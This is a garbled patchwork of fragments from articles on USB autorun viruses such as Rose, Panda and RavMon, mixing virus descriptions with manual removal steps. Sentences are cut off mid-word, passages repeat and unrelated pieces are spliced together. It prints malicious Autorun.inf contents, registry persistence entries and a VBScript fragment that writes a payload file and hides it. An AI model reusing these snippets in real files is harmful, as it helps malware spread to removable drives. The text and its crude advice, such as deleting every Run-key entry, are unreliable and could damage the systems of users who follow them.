The disk partition cannot be opened by double-clicking;
Inserting a USB flash drive causes a virus infection;
After infection, the system is completely reinstalled (that is, the system disk is formatted and reinstalled, or restored from a Ghost image), but the virus is still rampant. This article explains the causes of these phenomena, the corresponding defensive strategies, and solutions.
First, let's talk
and see what it's about:
[AutoRun]
Open=recycle.exe
Shell\1= Open (o)
Shell\1\command=recycle.exe
shell\2= browse (B)
Shell\2\command=recycle.exe
Shellexecute=recycle.exe
Obviously, each time the USB stick auto-plays, it runs the program Recycle.exe. Now you can try to remove Autorun.inf, Recycle.exe, and four other virus files, then unplug the USB flash drive, then reconnect the USB drive in the virtua
Delete the "Autorun.inf" and "Sxs.exe" files on the C drive.
Right-click the D drive and select "Open".
Delete the "Autorun.inf" and "Sxs.exe" files on the D drive (there is another file, also an .exe; delete it too).
......
And so on: delete all the AUTORUN.INF files and "Rose.exe" files on the disks.
Click Start, select "Run", enter "regedit" (no quotes), and press Enter.
In the left pane of Registry Editor, expand My Computer > HKEY_LOCAL_MACHINE > softw
continue searching adjacent IP addresses for fast propagation.
2. When a virus is executed, the following files are generated:
Using system1_hxdef.exe
%Systempolicipolice.exe
%System%WinHelp.exe
%Systemw.netmeeting.exe (61,440 bytes)
Using system1_spollsv.exe (61,440 bytes)
%SysDir%\IEXPLORE.EXE
%SysDir%\kernel66.dll
%Sysdir1_ravmond.exe
%WinDir%\SYSTRA.EXE
%SysDir%\msjdbc11.dll
%SysDir%\MSSIGN30.DLL
%SysDir%\ODBC16.dll
%System%\lmmibw.dll
C:
HDM.exe is a vicious U disk virus; its destructive power lies mainly in the following areas:
Quote:
1. Restores the SSDT to defeat antivirus software
2. IFEO image hijacking
3. Closes specified windows
4. Deletes gho files
5. Breaks Safe Mode and the "show hidden files" function
6. Infects HTM and other web files
7. Spreads over the LAN by guessing passwords
8. Spreads through U disks and other removable storage
9. ARP spoofing
The specific analysis is as follows:
Qu
Teach you how to clean up the rose virus in the USB flash drive
The rose virus, one of the three major USB flash drive viruses, is believed to be a "frequent visitor" for many of our friends. The rose virus (rose.exe) is a benign virus consisting of two carrier files, namely ROSE.EXE and AUTOEXEC.BAT; double-click the storage device to read
to the system, and wait for several minutes without the trend of virus attacks. In this case, virus programs are affecting computers.
".
Select it and end the process, and the computer returns to its former calm. The first stage of disinfection is successful.
Next, let's see where the virus is hidden. Open "msconfig", start the system configuration, and sele
and folders" option below
Click "OK"
Right-click the C drive (do not double-click!) and select "Open".
Delete the "Autorun.inf" and "Sxs.exe" files on the C drive.
Right-click the D drive and select "Open".
Delete the "Autorun.inf" and "Sxs.exe" files on the D drive (there is another file, also an .exe; delete it too).
......
And so on: delete all the AUTORUN.INF files and "Rose.exe" files on the disks.
Click Start, select "Run", enter "regedit" (no quotes), and press Enter.
In the left pane of Registry Editor, expand My Computer > HKEY_LOCAL_MACHINE > SOFTWARE > Microsoft > Windows > CurrentVersion > Run.
Delete the ROSE (C:\windows\system32\SXS.exe) entry under the Run key.
Close Registry Editor
And then restart the computer
Remove the hard drive is Rose:
Press the SHIFT key to insert the USB drive u
uses the white "Panda incense" icon; after running, the virus copies itself to the system directory:
%system%\drivers\spoclsv.exe
To create a startup item:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Svcshare" = "%system%\drivers\spoclsv.exe"
Modify registry information to interfere with the "Show All Files and folders" setting:
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showa
we will often see a file named "Autorun.inf" in the root directory of each hard disk partition, and double-clicking the partition icon often fails to open the corresponding partition window; when this happens, it is almost certain that the local system has been infected with the recently rampant flash disk virus. The virus generally uses the "Autorun.inf" file for p
. The Rising experts will analyze it in detail!
Principle of USB flash drive Virus
The USB flash drive virus is usually transmitted using the automatic playback function of the Windows system. Automatic playback is a convenient function provided by Windows. However, it is exploited by hackers to increase the possibility of virus transmission.
: After th
\Microsoft\Command Processor
"AutoRun" = "C:\\windows\\system32\\candoall.exe"
This loading method is still rare.
Manual removal process using IceSword:
1. End the C:\WINDOWS\system32\candoall.exe and iexplore.exe processes.
2. Delete the following files (detailed steps: open IceSword, go to File, then locate and delete each virus file in turn):
C:\WINDOWS\system
Pandatv virus official version V1.6:
This tool detects, clears, and fixes files infected with the pandatv virus. It detects and processes unknown pandatv variants and can process all of the current pandatv family and related variants. As follows:
Testing shows it is easy to use. The two dedicated removal tools above can be used in turn to achieve better results.
After a file co
First of all, no matter what virus you have, if you do not understand what it is or suspect a virus, please try my plan first:
4. Start => Run => Input: msconfig => OK => Startup => Disable All (D) => OK
5. Start => Run => Input: regedit => OK => HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ => everything in the right pane can be deleted
6. Start => Run => Input: regedit => OK => hkey_loca
With the rising of the virus can not be worse, with Kabbah upgrade to May 25 after the ability to find, but note that Kabbah will infect Word documents, pictures together delete!
Because a lot of documents are urgent and important, losing them would be a serious problem, so people who do not understand computers should not use Kaspersky, because it is too professional.
Fortunately, the source file is not many, I deleted a few, the specific removal method on the Intern
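' Delete the existing file, forcing removal even if it is read-only
fso.DeleteFile fpath, True
' Recreate the file (mode 2 = ForWriting, True = create if missing) and write the payload text
Set fc = fso.OpenTextFile(fpath, 2, True)
fc.Write content
fc.Close
Set fc = Nothing
' Attributes 7 = ReadOnly (1) + Hidden (2) + System (4), which hides the file from a default Explorer view
Set fa = fso.GetFile(fpath)
fa.Attributes = 7
Set fa = Nothing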
End Sub
The code above has many annotations added, and if you have read this far, you probably have a pretty good idea of it. The coding quality is average; because this code was downloaded from a website of the South Normal University, its author is presumably a student. In this
change its value to 1, then select "Show all hidden files" and "Show system files" under Folder -- Tools -- Folder Options.
Worker Process ).
4. Start-run-msconfig to delete the startup items of the above virus.
5. On drives D, E, F..., use the right-click Open option and delete the sxs.exe and autorun.inf files on each drive.
Check whether any of the above processes appear in the process list. If there are other ins
Recent U disk viruses such as autorun.inf and ravmon.exe are rampant, causing strong dissatisfaction. The virus automatically modifies the registry so that users cannot view the following hidden file autorun.inf:
[AutoRun]
open=RavMon.exe
shell\open=Open (O)
shell\open\Command=RavMon.exe
shell\explore=Resource Manager (X)
shell\explore\Command="RavMon.exe-